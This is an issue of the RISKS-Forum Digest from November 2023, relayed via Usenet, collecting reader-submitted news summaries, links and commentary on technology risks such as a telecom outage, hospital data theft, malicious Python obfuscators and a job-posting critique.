RISKS-LIST: Risks-Forum Digest Saturday 11 November 2023 Volume 33 : Issue 93

ACM FORUM ON RISKS TO THE PUBLIC IN COMPUTERS AND RELATED SYSTEMS (comp.risks) Peter G. Neumann, founder and still moderator

***** See last item for further information, disclaimers, caveats, etc. ***** This issue is archived at <http://www.risks.org> as
<http://catless.ncl.ac.uk/Risks/33.93>
The current issue can also be found at
<http://www.csl.sri.com/users/risko/risks.txt>

Contents:
Man crushed to death by robot in South Korea (BBC News)
Risk of all your communication eggs in one basket (Sundry)
Recognizing Fake News Now a Required Subject in California Schools
(IJPR)
How Russian disinformation toppled multiple governments in Africa (WashPost) Russia fines Google $100 million, and Facebook parent company $27
million, for content violations (The Washington Post)
Cloudflare Outage: There's Plenty Of Blame To Go Around
(Data Center Frontier)
Essays: Decoupling for Security (Schneier on Security)
U.S. Drones Are Flying Over Gaza to Aid in Hostage
Recovery, Officials Say (The New York Times)
Look, Up in the Sky! Amazon's Drones Are Delivering Cans
of Soup! (*The New York Times)
Five big carmakers beat lawsuits alleging infotainment
systems invade privacy (Ars Technica)
Multiple Python Obscuration Tools that are not trustable
(Ars Techica)
Data on 267,000 Sarnia patients going back 3 decades among cyberattack
thefts at 5 Ontario hospitals (CBC)
Brothel compromises (Sundry items from Monty Solomon)
Android 14's storage disaster gets patched, but your data might be gone
(Ars Technica)
Man vs. Musk: A Whistleblower Creates Headaches for Tesla (NYTimes)
Don't trust *Find my apps* or location trackers like AirTags (WashPost)
Why Banks Are Suddenly Closing Down Customer Accounts (NYTimes)
Virginia State Police Prepares Team To Monitor Voter Removals (DCist)
The impasse over who controls your car data (WashPost)
This smart garage door controller is no longer very smart (The Verge)
Critical vulnerability in Atlassian Confluence server is under *mass
exploitation* (Ars Technica)
Re: A $92,000 flying car can reach speeds of 63 miles
(John Levine)
Re: Toyota has built an EV with a fake transmission, and
we've driven it (Martin Ward)
Re: They Cracked the Code to a Locked USB Drive Worth
$235 Million in Bitcoin. Then It Got Weird. (Dick Mills)
Re: Comments on RISKS-33.92 (Jericho)
Hiring: One Jamaican Bobsled Team -- and Weird Job
Descriptions (Cliff Kilby)
Abridged info on RISKS (comp.risks)

----------------------------------------------------------------------

Date: Wed, 8 Nov 2023 18:19:37 -0500
From: Gabe Goldberg <gabe@gabegold.com>]
Subject: Man crushed to death by robot in South Korea
(BBC News)

A man has been crushed to death by a robot in South Korea after it failed to differentiate him from the boxes of food it was handling, reports say.

https://www.bbc.com/news/world-asia-67354709

------------------------------

Date: Wed, 8 Nov 2023 16:55:45 +1100
From: Bruce Hunter <brucer.hunter@gmail.com>
Subject: Risk of all your communication eggs in one basket

Australia's second largest mobile and Internet service provider had a major outage across Australia today.

https://www.smh.com.au/technology/what-caused-the-optus-outage-20231108-p5eiep.html?btis
https://www.abc.net.au/news/2023-11-08/optus-outage-mobile-phones-internet-what-happened/103077180

It was revealing how dependent our society is on the full functioning of our communication services.

This outage affected public transport, `000' emergency calls (Australia's
911) for Ambulance-Police-Fire Brigades, Two-factor authentication of
websites, Uber, Taxis, Hospitals and the list goes on. People are
scrounging for other ways to connect as most of our digital life is
dependent on communication.

In a hint at reducing the risk impact of NO communication services, Optus spokesperson said:

"We are aware of some mobile phones having issues connecting to
triple-0. *If Optus customers need to call emergency services, we suggest finding a family member or neighbour with an alternative device"!* [emphasis added]. To Optus' credit they have returned systems to operation in just 8 hours.

Diversity is one of the key measures to improve reliability and
resilience. I was lucky to continue on as my Internet was with a
different provider to my mobile. As IoT, Cloud and 5G become the norm to
"interconnectedness" we will experience more risks to our "normal" life. I
just got to get a list of neighbours with an *alternative device*, just in
case. ;-)

[John Colville noted this item:
More than 10 million customers were affected by the
Optus outage (ABC):
Service failed at 4am AEDT and took 14 hours to be close to completely
recovered. No explanation yet as to cause. https://www.abc.net.au/news/2023-11-09/how-the-optus-outage-played-out/103079768
PGN]

------------------------------

Date: Sat, 11 Nov 2023 14:08:16 -0500
From: Monty Solomon <monty@roscom.com>
Subject: Recognizing Fake News Now a Required Subject in California
Schools (IJPR)

https://www.ijpr.org/media-society/2023-11-10/recognizing-fake-news-now-a-required-subject-in-california-schools

------------------------------

Date: Sun, 5 Nov 2023 13:48:29 -0500
From: Monty Solomon <monty@roscom.com>
Subject: How Russian disinformation toppled multiple
governments in Africa (WashPost)

In the two years since an Israeli company first tried to thwart a Russian disinformation campaign in Burkina Faso, coups or rebels have removed the governments of five former French colonies, replacing them with pro-Russia leaders.

https://www.washingtonpost.com/technology/2023/10/21/percepto-africa-france-russia-disinformation/

------------------------------

Date: Sun, 26 Dec 2021 15:04:00 -0500
From: Gabe Goldberg <gabe@gabegold.com>
Subject: Russia fines Google $100 million, and Facebook parent company $27
million, for content violations (The Washington Post)

MOSCOW — A Russian court fined Google nearly $100 million Friday for “systematic failure to remove banned content” — the largest such penalty yet
in the country as Moscow attempts to rein in Western tech giants.

The fine was calculated based on Google’s annual revenue, the court
said. Roskomnadzor, Russia’s Internet regulator, told the court that Google’s 2020 turnover in the country exceeded 85 billion rubles, or about $1.15 billion.

Meta Platforms, the parent company of Facebook and Instagram, was fined approximately $27 million, also for declining to remove banned content,
several hours after the Google decision. Meta’s fine, like the one levied on Google, was tied to yearly revenue in Russia.

The fines represent an escalation in Russia’s push to pressure foreign tech firms to comply with its increasingly strict rules on what it deems illegal content — particularly apps, websites, posts and videos related to jailed opposition leader Alexei Navalny’s network, which has been labeled as extremist in the country.

https://www.washingtonpost.com/world/2021/12/24/google-russia-fine-banned-content/

------------------------------

Date: Wed, 8 Nov 2023 14:56:29 +0000
From: Victor Miller <victorsmiller@gmail.com>
Subject: Cloudflare Outage: There's Plenty Of Blame To Go Around
(Data Center Frontier)

https://www.datacenterfrontier.com/cloud/article/33014487/cloudflare-outage-theres-plenty-of-blame-to-go-around

------------------------------

Date: Wed, 8 Nov 2023 14:43:54 +0000
From: Victor Miller <victorsmiller@gmail.com>
Subject: Essays: Decoupling for Security (Schneier on Security)

https://www.schneier.com/essays/archives/2023/11/decoupling-for-security.html

------------------------------

Date: Sun, 5 Nov 2023 22:25:32 -0500
From: Gabe Goldberg <gabe@gabegold.com>
Subject: U.S. Drones Are Flying Over Gaza to Aid in Hostage
Recovery, Officials Say (The New York Times)

The military has been sending weapons and advisers to Israel, but the
flights suggest a more active American role.

Approximate paths of American military drone flights over the Gaza
Strip. Flights shown here are from Oct. 28 to Nov. 2, of which at least six flights were over Gaza.

Source: Flight path data from FlightRadar24. Paths are approximate based on each flight's reported position about every minute.

https://www.nytimes.com/2023/11/02/world/middleeast/israel-hamas-gaza-hostages-us.html?smid=nytcore-ios-share&referringSource=articleShare

[Military drones are tracked by FlightRadar24? That doesn't seem like a
good idea...]

------------------------------

Date: Sat, 4 Nov 2023 19:26:46 -0400
From: Gabe Goldberg <gabe@gabegold.com>
Subject: Look, Up in the Sky! Amazon's Drones Aree
Delivering Cans of Soup! (*The New York Times)

Amazon’s much-hyped drone project is dropping small objects on
driveways. Some customers are not sure what it delivers beyond minestrone.

Only one item can be delivered at a time. It can’t weigh over five
pounds. It can’t be too big. It can’t be something breakable, since the drone drops it from 12 feet. The drones can’t fly when it is too hot or too windy or too rainy.

The Texas weather plays havoc with important deliveries. Mr. Lord, a 54-year-old professor of civil engineering at Texas A&M, ordered a
medication through the mail. By the time he retrieved the package, the drug
had melted. He’s hopeful that the drones can eventually handle problems like this.

“I still view this program positively knowing that it is in the experimental phase,” he said.

https://www.nytimes.com/2023/11/04/technology/amazon-drone-delivery.html

The risk? Bezos fortune? Nah. Looking stupid? We'll see...

[Who gets sued if the 5-pound can of soup happens to kill the house owner?
What if a poor homeless person is stealing deliveries? What about reports
of thieves who are tracking delivery vehicles. PGN]

------------------------------

Date: Fri, 10 Nov 2023 01:14:09 -0500
From: Monty Solomon <monty@roscom.com>
Subject: Five big carmakers beat lawsuits alleging infotainment
systems invade privacy (Ars Technica)

https://arstechnica.com/?p=1982702

------------------------------

Date: Thu, 9 Nov 2023 06:19:25 -0500
From: Bob Gezelter <gezelter@rlgsc.com>
Subject: Multiple Python Obscuration Tools that are not trustable
(Ars Techica)

Scripting languages do not use compilers, but applications written in
scripting languages, e.g., Python, often use compression and obfuscation
tools both to reduce download volume and simultaneously increase the
difficulty and effort of reverse engineering. Such tools have a long
history, I remember a PL/I source compressor program back in the late-1970s.

I remember an item in ACM SIGPLAN from slightly later on the subject of can
one trust a compiler to not insert malevolent object code.

Obfuscators and compressors in this regard, are effectively compilers. They have the potential to insert foreign logic into the processed scrips.

ArsTechnica has reported that the security firm Checkmarx has identified
eight malevolent Python obfuscators have been in active circulation since January of this year, inserting code to activate cameras, steal passwords, download files, and other severely compromising actions.

Just because a script is not compiled, does not mean that it cannot be compromised.

The ArsTechnica article can be found at: https://arstechnica.com/security/2023/11/developers-targeted-with-malware-that-monitors-their-every-move/

------------------------------

Date: Thu, 9 Nov 2023 12:24:50 -0700
From: Matthew Kruk <mkrukg@gmail.com>
Subject: Data on 267,000 Sarnia patients going back 3
decades among cyberattack thefts at 5 Ontario hospitals
(CBC)

https://www.cbc.ca/news/canada/windsor/hospital-cyber-update-data-1.7023826

Patients' information -- including the reasons for their visits -- going
back three decades from Bluewater Health in Sarnia, Ont., and its
predecessor hospitals is among the data confirmed stolen in the cyberattack
on five southwestern Ontario hospitals.

Transform, the hospital's IT provider, now confirms a database report containing information on 267,000 patients was taken. The report includes details about "every patient" seen at Bluewater Health and its
predecessors since Feb. 24, 1992.

------------------------------

Date: Fri, 10 Nov 2023 16:54:11 -0500
From: Monty Solomon <monty@roscom.com>
Subject: Brothel compromises (Sundry items)

3 Charged With Running Prostitution Service Used by
Politicians and Others https://www.nytimes.com/2023/11/08/us/politics/justice-department-brothel.html

Prosecutors say brothel suspect also collected possibly fraudulent COVID
funds. Investigators believe James Lee used several business and related
bank accounts to “launder the proceeds of the prostitution business,” court documents show. https://www.boston.com/news/crime/2023/11/10/prosecutors-brothel-suspect-collected-possibly-fraudulent-covid-funds/

Exposure of brothels that catered to the elite spotlights how legal system treats buyers and sellers in sex trade https://www.bostonglobe.com/2023/11/10/metro/brothel-bust-massachusetts-legal-system/

Affidavit details how investigators discovered brothel ring that allegedly catered to wealthy in Boston area and Virginia https://www.bostonglobe.com/2023/11/09/metro/brothel-bust-boston/

------------------------------

Date: Tue, 7 Nov 2023 10:42:39 -0800
From: Lauren Weinstein <lauren@vortex.com>
Subject: Android 14's storage disaster gets patched, but your data might be
gone (Ars Technica)

https://arstechnica.com/gadgets/2023/11/android-14-patches-ransomware-storage-bug-but-some-users-will-lose-data/?utm_brand=arstechnica&utm_social-type=owned&utm_source=mastodon&utm_medium=sociald

------------------------------

Date: Fri, 10 Nov 2023 14:50:02 -0500
From: Gabe Goldberg <gabe@gabegold.com>
Subject: Man vs. Musk: A Whistleblower Creates Headaches for Tesla
(The New York Times)

Man vs. Musk: A Whistleblower Creates Headaches for Tesla. An employee who
was fired after expressing safety concerns leaked personnel records and sensitive data about driver-assistance software.

A day after Lukasz Krupski put out a fire at a Tesla car delivery location
in Norway, seriously burning his hands and preventing a disaster, he got an email from Elon Musk.

“Congratulations for saving the day!” Mr. Musk, Tesla’s chief executive, wrote in March 2019.

But what started as a story about a heroic employee and a grateful employer
has devolved into an epic battle between the carmaker and Mr. Krupski, a service technician. The fight has spawned lawsuits in Norway and the United States and caught the attention of regulators in several countries.

After initially being hailed as a savior, Mr. Krupski said in an interview
with The New York Times, he was harassed, threatened and eventually fired
after complaining about what he considered grave safety problems at his workplace near Oslo. Mr. Krupski, originally from Poland, was part of a crew that helped prepare Teslas for buyers but became so frustrated with the
company that last year he handed over reams of data from the carmaker’s computer system to Handelsblatt, a German business newspaper.

https://www.nytimes.com/2023/11/10/business/tesla-whistleblower-elon-musk.html?smid=nytcore-ios-share&referringSource=articleShare

------------------------------

Date: Wed, 8 Nov 2023 06:51:35 -0700
From: Jim Reisert AD1C <jjreisert@alum.mit.edu>
Subject: Don't trust *Find my apps* or location trackers
like AirTags (WashPost)

By Shira Ovide, *The Washington Post*, 7 Novan 2023

Two dangerous cases of mistaken identity using the Find My app showed that location-tracking technology can be useful -— but it cannot be trusted.

https://www.washingtonpost.com/technology/2023/11/07/tracking-find-my-apps-accuracy/

Prosecutors say that a teenager and two friends set fire to a Denver home
where he believed Apple’s Find My app showed his stolen iPhone.
The teen later realized that the location data pinpointed the wrong house, according to prosecutors. Two of the teens are facing murder charges.

Last year, a SWAT team in Denver looking for a truck with stolen guns and an iPhone mistakenly raided the home of a 77-year-old woman. A lawyer for the woman, Ruby Johnson, says police relied on location data from the Find My
app that took them to the wrong house. (The Denver Police Department
declined to comment.)

Location tracking information in Apple’s Find My technology and similar software for Android phones can be incredibly useful, as are location
trackers such as Tile and Apple AirTags that can help find your keys buried
in the sofa cushions.

But as the two cases in Denver show, those location identifying technologies are not always accurate and the consequences can be dire.

The bottom line: You shouldn’t entirely trust location identifying technology.

------------------------------

Date: Sun, 5 Nov 2023 22:23:56 -0500
From: Gabe Goldberg <gabe@gabegold.com>
Subject: Why Banks Are Suddenly Closing Down Customer Accounts
(*The New York Times*)

Surprised individuals and small-business owners can’t pay rent or make payroll, and no one ever explains what they did wrong.

https://www.nytimes.com/2023/11/05/business/banks-accounts-close-suddenly.html

------------------------------

Date: Tue, 7 Nov 2023 17:35:25 -0500
From: Gabe Goldberg <gabe@gabegold.com>
Subject: Virginia State Police Prepares Team To Monitor Voter
Removals (DCist)

Virginia is the only state in the U.S. where people who’ve committed any felony automatically lose their right to vote unless the governor restores
it, according to the Brennan Center for Justice.

In September, VPM News reported on an Arlington County man who’d had his rights restored by former Gov. Ralph Northam, but had been stricken from the voter rolls after a probation violation.

State officials at ELECT and the Virginia State Police initially denied
there was a systemic problem. The next week, they acknowledged the error; a spokesperson of Gov. Glenn Youngkin estimated it affected fewer than 300 people. But on 27 Oct 2023, ELECT said the total was more than 10 times that estimate.

Same-day registration on Election Day can only happen at a voter’s polling place, which can be found online or by calling a local election office. This
is the second general election to take advantage of the process, which
passed the then -– Democrat controlled General Assembly along party lines in 2020.

https://dcist.com/story/23/11/07/virginia-voter-removal-2023-election-state-police-watch-team

------------------------------

Date: Fri, 10 Nov 2023 14:01:17 -0500
From: Gabe Goldberg <gabe@gabegold.com>
Subject: The impasse over who controls your car data (WashPost)

CitySide Subaru, a car dealership in the Boston area, regularly loses
potential customers for a surprising reason: Subaru has disabled some of its own software in a stalemate over control of data from your car.

That means no automatic emergency calls if the car crashes, no wireless notifications from the dealer about maintenance problems and no option to remotely start the car and fire up the heater. (Don’t judge. It’s cold in Massachusetts.)

Nathan White, CitySide’s general manager, said his staff warns car shoppers that features like those requiring wireless transmission don’t work on new Subaru models sold in the state.

The lack of those features is a “conversation we have to have with the customer,” White said. “To be honest with you, it’s a couple of percent a month” in lost vehicle sales. [...]

“This all comes down to who owns the information,” White said. “Shouldn't
the customer have some say?”

https://s2.washingtonpost.com/camp-rw/?trackId=596b22969bbc0f403f8bcc25&s=654e689d8c1e4d00e8e615

------------------------------

Date: Wed, 8 Nov 2023 00:22:29 -0500
From: Monty Solomon <monty@roscom.com>
Subject: This smart garage door controller is no longer very smart
(The Verge)

https://www.theverge.com/23949612/chamberlain-myq-smart-garage-door-controller-homebridge-integrations

------------------------------

Date: Wed, 8 Nov 2023 00:46:04 -0500
From: Monty Solomon <monty@roscom.com>
Subject: Critical vulnerability in Atlassian Confluence
server is under *mass exploitation* (Ars Technica)

https://arstechnica.com/security/2023/11/critical-vulnerability-in-atlassian-confluence-server-is-under-mass-exploitation/

------------------------------

Date: 29 Dec 2021 19:26:32 -0500
From: "John Levine" <johnl@iecc.com>
Subject: Re: A $92,000 flying car can reach speeds of 63 miles
per hour (Business Insider, RISKS-33.92)

Perhaps we can try and collect all the reasons why a flying car that can
only go 20 miles before it falls out of the sky is a bad idea.

How is it licenced? Is it a car, a plane, or something else?

How high can it go? There's one set of problems flying close to
the ground (running into obstacles), a different set flying
higher up (running into airplanes), etc.

I happen to live near a lake which is about 30 miles long and a mile wide,
so something that let me go directly across the lake rather than around one
end or the other might be useful, but I'm having trouble thinking of other scenarios for this thing.

------------------------------

Date: Mon, 6 Nov 2023 13:02:10 +0000
From: Martin Ward <mwardgkc@gmail.com>
Subject: Re: Toyota has built an EV with a fake transmission, and
we've driven it (Ars Technica)

Do you get bored driving your electric car with nothing to do but
maintain your speed and direction and keep your attention on other
road users and driving conditions?

Well, Toyota has added a computer game that you can play as you drive! (TOY-ota, get it?) Instead of a mouse and keyboard this game has an extra pedal and joystick as game interfaces for you to play with, and plays full volume game sound through the car's sound system. Best of all, if you mess
up one of the moves in the game, the car will actually stop accelerating, or even suddenly stall!

I think that they should add a warning message for other road users
(similar to those on driving instructor's cars): "Please keep your
distance. Driver is playing a computer game while driving. Car may stall
suddenly."

Children used to stick cards in their bikes, so that they would make fake
motorbike noises as the card flaps against the spokes of the wheels. I
suppose this is the "grown ups" version, but with added danger to other
road users. The, ahem, "young at heart" reporter at Ars Technica says that
"it made things so much more fun"!

------------------------------

Date: Mon, 6 Nov 2023 17:14:52 -0500
From: Dick Mills <dickandlibbymills@gmail.com>
Subject: Re: They Cracked the Code to a Locked USB Drive Worth
$235 Million in Bitcoin. Then It Got Weird. (RISKS-33.92)

The *Wired* article makes a good read. It gives details on how one company cracked the encryption of the locked USB drive, in part by examining a
sample of the drive.

It has been many years since I recall reading on this risks forum that
security through obscurity was foolish and futile. The USS drive
manufacturer should have been able to open source everything without compromising security. Here's a quote from Risks 12:25 "Within the Multics community, anything less than a complete willingness to hand critical code
over to any hacker who asked for it was demeaningly referred to as "security through obscurity," and was avoided at all cost."

A year ago, I had to cancel my LastPass account because their obscure
secrets were compromised.

Is the doctrine ridiculing security through obscurity dead?

[Nice reminder. Yes, it is widely ignored today. Dick, Tom Van Vleck,
and I are among the few remaining early Multicians who contribute who
still contribute to RISKS. And I am the pain-in-the-ass Multician who
keeps reminding RISKS readers that the Multics hardware and operating
system completely resolved the stack buffer-overflow problem in 1965 -- a
wonderful visionary leap into the future that has almost completely
ignored by almost everyone else. But I believe that Multicians never
forget (like elephants?), because the principled development was so
pervasive. PGN]

------------------------------

Date: Sun, 5 Nov 2023 23:11:29 -0700
From: "Jared E. Richo" <jericho@attrition.org>
Subject: Re: Comments on RISKS-33.92

Abridged comments, to remind us to scrutinize and be critical of the news
we read, if you'll permit. Almost a 30-year reader of RISKS, this issue
just hit all the right buttons for a reply to the entire thing, which is
a first for me, a professional critic of sorts. -- jericho

[Jericho, Thanks for your comments. I decided to run most of them, as a
reminder to myself. Everything is indeed tumbling down.. PGN]

Subject: Apple Disables Maps Features in Israel and Gaza

Meanwhile, doesn't disable in other conflict regions?

Subject: California halts operations of Cruise self-driving robotaxis

Meanwhile, allows ex-DUI and elderly that cannot pass a current eye exam to drive.

Subject: Oveview of the iLeakage Attack (Jason Kim et al.)

Eh.. Spectre-evolved? Or are you really claiming Apple ignored Spectre,
Spectre v2, Spectre v3 / SPECTRE-NG, Spectre v4 / SPECTRE-NG, Spectre v5 / ret2spec, Spectre-BHB...

Subject: AI Firms Must Be Held Responsible for Harm They Cause,
'Godfathers' Say (Dan Milmo)

Sorry... "godfather" implies at least two generations, if not three. Modern so-called "AI" is still an infant. You already abused the term "AI", you
don't get to abuse more terms.

Subject: President Biden Issues Executive Order one Safe, Secure, and
Trustworthy Artificial Intelligence (Whitehouse.gov)

"Trustworthy Artificial Intelligence" .. oxymoron.

Subject: Executive Order on AI

In an op-ed for Bloomberg Law, EPIC's Executive Director Alan Butler
argued for the need for an overriding federal privacy law.

But better than ECPA, COPPA, GLBA, HIPAA, FERPA... right?

Subject: Humans Find AI-Generated Faces More Trustworthy
Than the Real Thing (Scientific American)

Big surprise here! As Joe Navarro tells us in his most basic of books,
humans are -trained- to lie from a shockingly early age. AI isn't explicitly trained to, but it is programmed by the humans that are.

Subject: AI Muddies Israel-Hamas War in Unexpected Way (NYTimes)

Subject: AI generated allegations against Big Four consulting firms

Ibid.

Subject: Meta Accused by States of Using Features to Lure Children to
Instagram and Facebook (NYTimes)

Eh, not like history has shown us they don't care. Now they are getting in
on the game?

Subject: FCC robocall enforcement does little to stop illegal calls,
Senate hears

Hundreds of millions could have testified a decade ago.

Subject: Amazon, Microsoft, and India crack down on tech support scams

Meanwhile, many customers interfacing with the actual support channels still feel it is a scam.

Date: Sun, 29 Oct 2023 11:40:02 -0400

Subject: Top Philips Executive Approved Sale of Defective Breathing
Machines by Distributors, Despite Tests Showing Health Risks

(ProPublica)

Pharmacom only cares about profit, news at 11.

Subject: How a Big Pharma Company Stalled a Potentially Lifesaving
Vaccine in Pursuit of Bigger Profits (ProPublica)

Ibid.

Subject: How a Lucrative Surgery Took Off Online and Disfigured Patients

If doctors fall for this crap, does society stand a chance?

------------------------------

Date: Sat, 11 Nov 2023 15:42:13 -0500
From: Cliff Kilby <cliffjkilby@gmail.com>
Subject: Hiring: One Jamaican Bobsled Team -- and Weird Job Descriptions

I am in the market for employment again, and the job postings are amusing.
I thought it might be helpful to discuss it a bit. I am a security professional, with a specialization in process management. I happen to also have a background in Linux operations, and development. I have even done networking (IPv4, and TIA 568A).

These were all separate jobs. I am bemused that the industry has seemed to
move in the direction that professionals are expected to do all those at
once, and somehow maintain proficiency in any of them.

The following are excerpts from job postings. Each job posting is for a
single position.

This is two jobs:
Remediation management (e.g., Vulnerability [Web, Database, OS] and Plan of Action and Milestones [POA&M]).

Vulnerability management should not include project management. If your security department is tracking milestones for deliverability of
remediation, they are no longer performing security.

This is two jobs, and a ludicrous expectation:
*Cloud Security* Essentials in at least 1 of *AWS, GCP or Azure*. Working knowledge of GCP and Azure.

Knowing the limitations and usages of a cloud platform is a job. Knowing
two, is two jobs. Knowing two and being certified in a third is ludicrous.


This is at least four jobs

Build security tools and automation for critical corporate infrastructure protection, monitoring, and remediation.
Develop DevOps pipelines and mature the SDLC process.

Security professionals do not develop security tools. Developers develop. Security professionals issue guidance and perform auditing and reporting on controls. Security is not DevOps, which was already more than two jobs.
SDLC management is development, ensuring it works is operations, validating that it exists is security.

This one is my favorite. 19,000,005 jobs. The listing is for a SOC Incident Handler:
Restores environment after an incident and ensures that the managed
security service has thorough detection capabilities in place for emerging threats.
Performs service requests from internal/external teams.
Maintains an advanced understanding of cyber security threats,
vulnerabilities, attacks, responsible groups, motivations and techniques.


SOC is an operations monitoring center. Restoring an environment is
operations. Validating detection rules, that's reasonable. Service requests
is helpdesk, maybe smart hands. If your operations monitoring center is performing operations, they are no longer monitoring. This is a violation of the Two-man rule (the language is older than I am). Gathering data to create security detections, that's a job. Analysis of security vulnerabilities,
that's a job. Analysis of *responsible groups, motivations and techniques*, that's a government.

This is *a* [single!] job:
*Performs a combination of duties in accordance with departmental
guidelines:*

- Leads the development of data security strategies and designs data
security architecture for CNA IT systems that aligns with CNA Secure Data
Strategy, embedding security into the overall approach and vision for
data across the enterprise.

- Participates in the creation, update and review of corporate security
policies and technology standards for data security.

- Creates and maintains the information security technology standards to
align with corporate data security policies and standards

- Develops and maintains data security solution and technology roadmaps for
structured and unstructured data discovery, classification, protection
and data rights management on premise and in the Cloud.

- Develops, maintains and governs the reusable data security framework and
design patterns

- Develops the enterprise security solutions that deliver Secure Data
Analytics, collecting and analyzing business and event data to drive
security value and enabling the utilization of data as a business asset.

- In collaboration with Information Security and Legal, design solutions
and processes to resolve current and potential legal and regulatory
issues affecting information security and assesses their impact on CNA's
security and technology teams.

- Contributes to general enterprise architecture framework and strategy

[continued in next message]

--- SoupGate-Win32 v1.05
* Origin: fsxNet Usenet Gateway (21:1/5)